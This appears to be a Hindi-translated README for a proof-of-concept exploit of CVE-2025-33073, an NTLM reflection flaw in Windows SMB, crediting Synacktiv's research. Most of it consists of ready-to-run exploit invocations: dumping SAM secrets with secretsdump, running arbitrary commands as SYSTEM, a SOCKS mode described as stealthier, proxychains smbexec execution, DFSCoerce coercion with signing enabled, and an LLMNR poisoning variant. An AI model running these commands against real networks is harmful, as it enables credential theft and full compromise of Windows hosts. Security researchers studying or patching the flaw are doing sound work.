
NTLM reflection SMB दोष के लिए PoC Exploit
NTLM रिफ्लेक्शन SMB दोष के लिए PoC एक्सप्लॉइट।
सभी श्रेय आधिकारिक शोध को जाता है:
https://www.synacktiv.com/en/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025
OS: Kali Linux (अधिकांश पैकेज पूर्व-स्थापित हैं)।
यह उपकरण स्वचालित रूप से एक वर्चुअल वातावरण का उपयोग करेगा। इसे सेट करने के लिए, चलाएँ:
./setup.sh
यह एक वर्चुअल वातावरण बनाएगा और ldap3-bleeding-edge==2.10.1.1337 सहित सभी आवश्यक निर्भरताओं को स्थापित करेगा।
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65
कस्टम कमांड
secretsdump चलाने के बजाय एक कस्टम कमांड निष्पादित किया जा सकता है।
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --custom-command "whoami"

SOCKS
SYSTEM के रूप में वैध कनेक्शन होने के बाद कमांड के अधिक गुप्त निष्पादन के लिए। यहाँ --target और --target-ip समान होने चाहिए।
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --socks
SAM को डंप करने के बजाय proxychains के माध्यम से एक कस्टम कमांड भी चलाया जा सकता है।
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec

यह देखने के लिए शोध किया गया कि क्या SMB साइनिंग सक्षम होने पर रिफ्लेक्शन वास्तव में काम नहीं करता है, जिसके परिणामस्वरूप ऐसी बग्स मिलीं जहाँ यदि पैकेट से SIGN/SEAL हटा दिए जाएं तो SMB से LDAPS पर रिले करना संभव है, जो सामान्यतः MIC के कारण संभव नहीं है।
धन्यवाद:
python3 CVE-2025-33073.py -u "thewoods.local\test" -p 'pass' -d 192.168.204.131 --dns-ip 192.168.204.133 --dc-fqdn DC01.thewoods.local --target 192.168.204.133 --target-ip 192.168.204.133 -M DFSCoerce --smb-signing
यदि आप डिवाइस के समान ब्रॉडकास्ट डोमेन में हैं और यह LLMNR पॉइज़निंग के लिए संवेदनशील है, तो DNS रिकॉर्ड पंजीकृत किए बिना डिवाइस का शोषण करना संभव है।

स्थानीय NTLM प्रमाणीकरण होता है

स्थानीय NTLM प्रमाणीकरण नहीं होता है जिसके परिणामस्वरूप विफल प्रयास होता है

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33073